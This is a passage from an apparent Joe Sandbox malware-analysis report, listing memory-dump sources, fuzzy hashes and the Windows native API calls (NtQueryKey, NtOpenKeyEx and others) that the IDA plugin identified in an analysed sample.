              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileInformationVolume
              • String ID:
              • API String ID: 2893123674-0
              • Opcode ID: d288ba80d240c1dd28e81b079edeeb52074e91e1b66296d64a0eee0d0dcb6881
              • Instruction ID: 7b5e6ee473d866efa25fd80cf1597bc44ec6a8ab18e38395cce30c9ed3f2e705
              • Opcode Fuzzy Hash: d288ba80d240c1dd28e81b079edeeb52074e91e1b66296d64a0eee0d0dcb6881
              • Instruction Fuzzy Hash: ABE0ECA2505158BAD624A7EBAC0CDF77F6CDBC67B1B448419B58992150C660AC41C6F0
              APIs
              • NtQueryKey.NTDLL(?,?,?,?,?), ref: 00A1929F
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Query
              • String ID:
              • API String ID: 3850148591-0
              • Opcode ID: c611e281d5707c09a3e99eb466a517df8a6d6f8df0377b807d09f78188a899ca
              • Instruction ID: dfc70b61fe552b252e49a49dbae87f374b1a54fbd638f3c0a626054e66de45be
              • Opcode Fuzzy Hash: c611e281d5707c09a3e99eb466a517df8a6d6f8df0377b807d09f78188a899ca
              • Instruction Fuzzy Hash: 9CE0ECA2110264BEA61097DAAC0DEF77F6CDBD67B2F048119B54992110D270AC45C2B0
              APIs
              • NtQueryObject.NTDLL(?,?,?,?,?), ref: 00A19623
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ObjectQuery
              • String ID:
              • API String ID: 2748340528-0
              • Opcode ID: aa9af29e648730ae4f87084d51c1ec52442c71dd146f633310f5161db866e4f0
              • Instruction ID: ec4832e9f06ea9bc85d34bd4b9a0b6cd6591ee1bd3ff5a157c7cf4fed6740e6d
              • Opcode Fuzzy Hash: aa9af29e648730ae4f87084d51c1ec52442c71dd146f633310f5161db866e4f0
              • Instruction Fuzzy Hash: D6E0ECB1504158BA971097DA9C0DDF77F6CDBC67B0F044129B518E21109660AC41C6F0
              APIs
              • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 00A19787
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileInformationQueryVolume
              • String ID:
              • API String ID: 634242254-0
              • Opcode ID: 2e646d8fc8e7dee0d07c1f3847aa43d13f84282383526f65730bcc954c2e6da2
              • Instruction ID: e339a9451c543175db9c676b61e78ae66c7e2bf1e53ae44c4ff885301cb329ee
              • Opcode Fuzzy Hash: 2e646d8fc8e7dee0d07c1f3847aa43d13f84282383526f65730bcc954c2e6da2
              • Instruction Fuzzy Hash: 91E082A6400228BEE7609BCAAC0CEF77F2CDBC2BB0B048219B408A6100C270AD40C2B0
              APIs
              • NtUnlockFile.NTDLL(?,?,?,?,?), ref: 00A19837
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileUnlock
              • String ID:
              • API String ID: 45017762-0
              • Opcode ID: 972010868d1ab2776e710279483ecd20bc9af146c2b9a3f9fa27996e49301f05
              • Instruction ID: eb6070e37e7ce15d7e756140384861ac8e274352d831fc375a624f3ee87026e8
              • Opcode Fuzzy Hash: 972010868d1ab2776e710279483ecd20bc9af146c2b9a3f9fa27996e49301f05
              • Instruction Fuzzy Hash: A8E0ECA5100254BE965097DB9C0CDF7BF6CDBD67B1F048129B508D7110C260AD49C2B0
              APIs
              • NtQuerySection.NTDLL(?,?,?,?,?), ref: 00A198A3
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: QuerySection
              • String ID:
              • API String ID: 1985485932-0
              • Opcode ID: 2d4583f8054a60a3a26b44a90018c1bf6214e67f6027175fa5445ca4f64d6137
              • Instruction ID: 5b6985782799005663c47fe4a9b325fcdd86f77c36375605b74f0c8dd91116ef
              • Opcode Fuzzy Hash: 2d4583f8054a60a3a26b44a90018c1bf6214e67f6027175fa5445ca4f64d6137
              • Instruction Fuzzy Hash: 8AE0ECB5508258BEA71097DA9C0CDF77F6DDBD77B0B544029B509E21508261AC41C2B0
              APIs
              • NtQueryInformationFile.NTDLL(?,?,?,?,?), ref: 00A199CF
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileInformationQuery
              • String ID:
              • API String ID: 365787318-0
              • Opcode ID: 16ce7f900cc081176651bc20b2e2600567dd0385e1a85dbda2eaba09309ac255
              • Instruction ID: ff58fb1f31c6f6080c3604140d4830874e1a68412783436fc452f64be7b39584
              • Opcode Fuzzy Hash: 16ce7f900cc081176651bc20b2e2600567dd0385e1a85dbda2eaba09309ac255
              • Instruction Fuzzy Hash: D7E0ECA1501154BA971097DA9C0CEF77F6CDBD67B1B44811DB609921109661AD41C6B4
              APIs
              • NtOpenKeyEx.NTDLL(?,?,?,?), ref: 00A19045
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 9d04ad9c09b1f9145f03a4ee5bc61bde53c203aa6d8095b7ff69aa8261ac0be4
              • Instruction ID: 6f693866085143b8ddf31d08fc7fad11bdc28c50ba04fa9f6f43bcadc521580b
              • Opcode Fuzzy Hash: 9d04ad9c09b1f9145f03a4ee5bc61bde53c203aa6d8095b7ff69aa8261ac0be4
              • Instruction Fuzzy Hash: 91D0A7F1004128BEE71093D99C0DEF77E9CDB993E1F048019B105D3000C2A5AC80C3F0
              APIs
              • NtSetInformationKey.NTDLL(?,?,?,?), ref: 00A19561
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Information
              • String ID:
